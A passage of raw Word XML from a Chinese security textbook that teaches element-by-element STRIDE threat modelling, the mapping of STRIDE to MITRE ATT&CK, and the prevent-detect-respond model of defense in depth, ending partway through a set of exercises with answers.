    <w:bookmarkStart w:id="367" w:name="逐元素应用stride威胁检查"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">逐元素应用STRIDE威胁检查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DFD绘制完成后，STRIDE的核心操作是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">逐元素遍历</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——对DFD中的每一个元素（外部实体、进程、数据存储、数据流），依次检查六类威胁，找出该元素在该类威胁下可能存在的脆弱性。这一过程的逻辑基础是：并非每类威胁对每个元素都同等适用，但每个元素都有其针对性的威胁子集。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一个被广泛采用的映射关系（见Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SDL威胁建模指南）如下：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元素类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">重点检查的威胁类</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">外部实体</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">S（欺骗——攻击者是否可能冒充该实体？）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">S、T、R、I、D、E（进程作为代码执行体，六类威胁均需审视）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">数据存储</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">T、I、D（存储的数据是否可被篡改、泄露或破坏可用性？）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">数据流</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">T、I、D（传输中的数据是否面临篡改、窃听或中断？）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">以一道注入攻击前的Web请求处理流为例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，假设DFD中存在数据流：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“用户浏览器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Web应用服务器（HTTP请求）”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。对该数据流应用STRIDE：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1213"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">S（欺骗）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Web服务器如何验证请求确实来自合法用户？是否依赖可被伪造的IP地址或HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Header？——这指向认证与Session管理缺陷的威胁；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1213"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T（篡改）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者是否能在传输中修改请求参数（如用Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Suite拦截并篡改POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">body）？是否缺乏TLS保护？——这指向传输层安全与输入完整性验证的威胁；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1213"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">R（否认）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：如果用户提交了恶意订单后否认，服务器是否有足够的审计证据（如数字签名或不可否认日志）？——这通常不属于Web请求流的主要威胁，但适用于交易系统的日志设计；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1213"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">I（信息泄露）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：请求中携带的Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Token或个人信息是否通过加密信道传输？——这直接指向TLS实施的必要性；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1213"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">D（拒绝服务）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者是否可能发送大量恶意请求耗尽服务器资源？是否缺少速率限制？——这指向第20.1节讨论的DoS缓解；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1213"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">E（权限提升）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：普通用户是否可能通过修改请求参数访问管理员功能？——这指向水平/垂直越权漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注意，这一过程不依赖“猜测”或“经验”，而是系统地在每个数据流的每个威胁维度上提出问题。分析者可以为每个确认的威胁记录一行：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">威胁描述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（攻击者如何做）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（得逞后的后果）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">缓解措施</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（设计上如何避免）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="367"/>
    <w:bookmarkStart w:id="368" w:name="stride与attck的映射关系"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE与ATT&amp;CK的映射关系</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE识别的是“可能存在什么威胁”，而MITRE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT&amp;CK框架描述的是“攻击者通常使用什么技术来实施这些威胁”。两者之间形成自然的映射关系，使得STRIDE析出的威胁能够被对应到ATT&amp;CK中具体的攻击技术和缓解措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">例如，STRIDE中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">E（权限提升）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应ATT&amp;CK中的Privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalation战术（TA0004），包括“Exploitation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for Privilege </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalation”（T1068）、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Sudo and Sudo Caching”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（T1548.003）等技术。当STRIDE分析某个进程时发现“低权限进程可能通过系统调用漏洞获取root权限”的威胁，蓝队可以立即查阅ATT&amp;CK中Privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalation的缓解措施（M1051——更新软件、M1038——执行预防、M1026——特权账户管理），将其转化为具体的加固行动。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类似地，I（信息泄露）映射到ATT&amp;CK的Credential</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Access（TA0006）和Collection（TA0009）战术；T（篡改）映射到影响配置或数据的多种技术。这种映射使得威胁建模产出能够直达可操作的防御手段，避免分析停留在“纸上谈兵”的层面。读者在使用时应注意：STRIDE威胁输出的粒度较粗（是“类型级”威胁），而ATT&amp;CK提供的是“技术级”详情，两者结合才能形成从抽象威胁到具体检测/缓解的完整闭环。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="368"/>
    <w:bookmarkEnd w:id="369"/>
    <w:bookmarkStart w:id="370" w:name="防御体系总图预防检测响应"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御体系总图：预防→检测→响应</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果说STRIDE帮助回答“防什么”的问题，纵深防御（Defense</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Depth）则回答“怎么防”的结构问题。纵深防御的核心思想是：单个安全控制必然会失效，安全不能依赖任何单点防御；真正的弹性来自多层异质控制的重叠覆盖，使得一层被突破后，后续层次仍有能力阻止、检测或延缓攻击，为响应争取时间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从操作流程的视角，纵深防御体系可以被组织为三个连续的时间阶段，它们共同构成蓝队防御工程的完整生命周期：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">graph LR</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A[预防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prevent] --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">B[检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Detect]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">C[响应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Respond]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-.-&gt;|反馈强化|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三个阶段的具体内容与本书各章的对应关系如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预防（Prevent）——让攻击更难发生</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预防控制的目标是减少攻击面，使攻击者在进入系统的第一步就遭遇阻力。预防措施包括本卷第20.1节详细阐述的主机加固（最小化服务与账户、CIS基线）、网络分段（将网络划分为不同安全域，限制横向移动的爆炸半径，回指《从位到物联》第26、28章的VLAN/ACL机制）、最小权限原则（用户与进程仅获得完成任务所需的最小权限）、补丁管理（消除已知漏洞构成的“免费入口”）、以及密码学控制（TLS加密传输、强口令策略）。预防是纵深防御的最外层，也是成本最低的防御阶段——在攻击发生之前阻止它，总比事后响应代价小。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测（Detect）——假设预防会失效</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测控制建立在一个谦逊但现实的假设之上：预防层迟早会被突破。检测的任务是当突破发生时，防御者能及时感知。本卷第19章已系统性阐述了检测工程的核心机制：网络侧的IDS/IPS（Snort/Suricata的签名检测，回指第19.1节）、主机侧的Sysmon/Linux审计日志采集、SIEM平台将多点日志汇聚后进行关联分析（回指第19.2节）。基于ATT&amp;CK的检测覆盖映射帮助蓝队回答“当前日志能检测到哪些ATT&amp;CK技术？哪些关键技术的检测是空白？”——这正是第19.2节中SIEM与ATT&amp;CK映射的核心。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">响应（Respond）——让检测产生价值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测本身不是目的，触发响应才是。响应阶段包括告警分诊（Triage，判断告警的严重性和真实性）、遏制（Isolation，将受感染的主机断网或停用账户）、根除（Remediation，清除恶意软件和后门）、恢复（Recovery，从已知良好状态重建系统）以及事后复盘（Post-Incident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Review，将经验教训反馈回预防和检测阶段）。响应能力直接决定了安全事件的实际影响——同样一次入侵，响应时间从数周全减至数小时，损失可能差出数量级。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御体系总图的核心信息是：STRIDE和纵深防御不是两款独立的产品，而是对同一问题——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“如何系统地保卫一个复杂的系统”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——从两个维度给出的答案。STRIDE从时间轴的“左端”（设计阶段）介入，帮助防御者在系统尚未建成时就预见威胁；纵深防御从空间轴的“纵深”（多层重叠控制）介入，确保系统在运行时即使单层失陷也不至于全线崩溃。两者结合，构成了蓝队防御工程从设计到运维的完整方法论。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="370"/>
    <w:bookmarkStart w:id="371" w:name="习题-18"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20.2.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题1（提取题·纵深防御原理）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">问题：为什么纵深防御强调“多层异质控制”而不是简单堆叠多个同类防火墙？结合本章和第20.1节的内容，解释“异质”的必要性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：思考同质控制是否可能共享同一个脆弱点（如共同依赖的底层操作系统或规则引擎），以及攻击者一旦突破一层的后续影响。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：同质控制意味着它们可能遭受同一种绕过技术的影响——如果所有安全层都依赖相同的规则匹配引擎，则该引擎的一个零日漏洞就可以“一键打穿”所有层。异质控制使用不同的技术实现（如网络层防火墙+应用层WAF+主机行为检测），使得攻击者必须克服不同类型的控制机制，任何单一漏洞无法保证全面突破，从而显著提高攻击成本。这也是防御设计中“不依赖于单一假设”的第一性原理体现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题2（提取题·网络分段的作用）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">问题：网络分段“限制爆炸半径”的具体含义是什么？假设一个企业网络没有分段，整个内网在同一个广播域中，一旦某台员工主机被钓鱼邮件植入恶意代码，攻击者可以执行哪些第18章中讨论过的后渗透操作？如果网络已按功能划分到不同的VLAN（员工网段/服务器网段/管理网段），这些操作面临什么障碍？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：回指第18章的后渗透横向移动技术（如Pass-the-Hash、内网扫描），思考这些技术对网络连通性的依赖。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
